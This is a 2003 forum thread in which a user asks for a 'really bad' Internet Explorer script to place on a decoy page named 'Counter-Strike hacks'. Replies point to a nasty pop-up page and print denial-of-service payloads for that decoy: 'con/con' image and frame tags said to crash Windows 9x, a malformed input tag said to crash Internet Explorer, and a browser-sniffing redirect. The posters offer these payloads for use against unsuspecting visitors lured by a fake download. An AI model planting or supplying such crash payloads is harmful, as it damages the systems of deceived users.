Author Topic: any IE only script i can put on my website?  (Read 462 times)

ShawnD1

  • Member
  • **
  • Posts: 77
  • Kudos: 106
any IE only script i can put on my website?
« on: 6 May 2003, 05:08 »
i already have that cupholder script as my 404 page but is there any script that does something just evil like automatically add itself into favourites or remove favourites or jump the page around or something?

i want to put a really bad code on a page on my website which i will call "Counter-Strike hacks"  :D

Refalm

  • Administrator
  • Member
  • ***
  • Posts: 5,183
  • Kudos: 704
  • Sjembek!
    • RADIOKNOP
any IE only script i can put on my website?
« Reply #1 on: 7 May 2003, 00:29 »
This is a really nasty code... don't use this page immediatly, first READ MY DAMN INSTRUCTIONS!

Create a HTML file called open.html with this code.

Then, I recommend using this flash movie. Otherwise, use any flash movie and call it "youare.swf".

However, if your good at editing HTML, you can probably manage it yourself  ;)

M51DPS

  • VIP
  • Member
  • ***
  • Posts: 608
  • Kudos: 30
any IE only script i can put on my website?
« Reply #2 on: 7 May 2003, 00:41 »
I think this part crashes Windows 9x
 
quote:
<img src="file:///c|/con/con">
<frame src="file:///c|/con/con">


This part should crash Internet Explorer 4.x and above.
 
quote:
<form><input type crash></form>


Finally, insert the following code into every page, it detects if they're using IE and could redirect them anywhere you want  ;) .

 
quote:
<script language="javascript">
<!--
if (navigator.appName == "Microsoft Internet Explorer") {
        document.location = "http://www.domain.com/ie_reject.html";
} else {
        document.location = "http://www.domain.com/realhomepage.html";
}
// -->
</script>

Pantso

  • Member
  • **
  • Posts: 1,249
  • Kudos: 55
    • http://www.support-freesoftware.org
any IE only script i can put on my website?
« Reply #3 on: 7 May 2003, 00:53 »
Note: The JavaScript part will only work if the IE user has JavaScript enabled. Most of them though, don't even know what JavaScript is, so it will work on 80% of them. I'm mean..   :D